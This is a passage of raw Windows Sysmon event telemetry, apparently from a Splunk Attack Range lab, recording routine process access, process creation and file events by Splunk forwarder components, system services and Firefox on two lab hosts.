Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.909{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.909{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.908{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.907{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.907{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8BFD-6151-577A-00000000FC01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.907{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BFD-6151-577A-00000000FC01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.874{5EBD8912-8BFD-6151-577A-00000000FC01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.720{5EBD8912-8BFD-6151-567A-00000000FC01}53961208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.674{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACF9315DF49CFD5DD11C24AA7FAB02D8,SHA256=7CA2D9B6F413B6DA4AD8FD469F75105B8ECAE259854C7CDAE63340B490648696,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:43.712{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53439-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.572{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3EA52E437983F67212AD80EDE7A3E9F,SHA256=41CD77E27CA36296C9024F4B9E21081DF5C139510732BF258B6D909FA747F1FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979850Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:45.474{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B50A8F54F241E3176CBC81B79C54854F,SHA256=F520FC68CF137E1634F348CD377974E11C79A1CD9AB66BC930DD6C28E128EB23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.376{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BFD-6151-567A-00000000FC01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.370{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.370{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.370{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8BFD-6151-567A-00000000FC01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.370{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.370{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.370{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BFD-6151-567A-00000000FC01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:45.347{5EBD8912-8BFD-6151-567A-00000000FC01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:46.877{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF34CFA3E2D36B862088833B52049960,SHA256=C5C2D720D149556EFB5547CA5D9CF8E86A71F6F4F2A2F5E369243453EC164613,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:46.594{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F94359239B014360F7450E1DA64CFF3,SHA256=0B054FD62F425866736B512E403813B60ACB78BB0FFF9055ADF505B7980D93D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979851Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:46.490{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FB1B527CE105629592DDEDB9C81AEDE,SHA256=A86994549BE329AD6022BF87C6192E05431B4AAF79EC2816AA0825CEBF079250,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:46.261{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:46.259{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:46.259{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:46.259{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:46.259{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:46.257{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3E-6151-3C78-00000000FC01}6364C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2fb50|C:\Program Files\Mozilla Firefox\xul.dll+e4cd19|C:\Program Files\Mozilla Firefox\xul.dll+e4c869|C:\Program Files\Mozilla Firefox\xul.dll+e4dd0f|C:\Program Files\Mozilla Firefox\xul.dll+116feb6|C:\Program Files\Mozilla Firefox\xul.dll+e4959d|C:\Program Files\Mozilla Firefox\xul.dll+e31230|C:\Program Files\Mozilla Firefox\xul.dll+1eed842|C:\Program Files\Mozilla Firefox\xul.dll+19f1947|C:\Program Files\Mozilla Firefox\xul.dll+19f3b4d|C:\Program Files\Mozilla Firefox\xul.dll+177e8a9|C:\Program Files\Mozilla Firefox\xul.dll+1bb4c30|C:\Program Files\Mozilla Firefox\xul.dll+16c2490|C:\Program Files\Mozilla Firefox\xul.dll+1b5b9aa|C:\Program Files\Mozilla Firefox\xul.dll+177ed4a|C:\Program Files\Mozilla Firefox\xul.dll+1bb4c30|C:\Program Files\Mozilla Firefox\xul.dll+16c2490|C:\Program Files\Mozilla Firefox\xul.dll+1b5b9aa|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+1867fbf|C:\Program Files\Mozilla Firefox\xul.dll+1a7ca90|C:\Program Files\Mozilla Firefox\xul.dll+1a78989 23542300x80000000000000001051218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:47.613{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CC9B9C87806FB99D95B9851152AE163,SHA256=E5C36FDC9B54BCA4BB61C5EA5C89E810622668152DA0E979D1D20AAFF2BCEBDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979852Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:47.505{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1010DAD3593A97493033D2016BCCB63B,SHA256=688822386EA58A99575FD3EFD6563F0372B433C1E086D6A3D66D5B48CDB08C06,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:47.529{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program 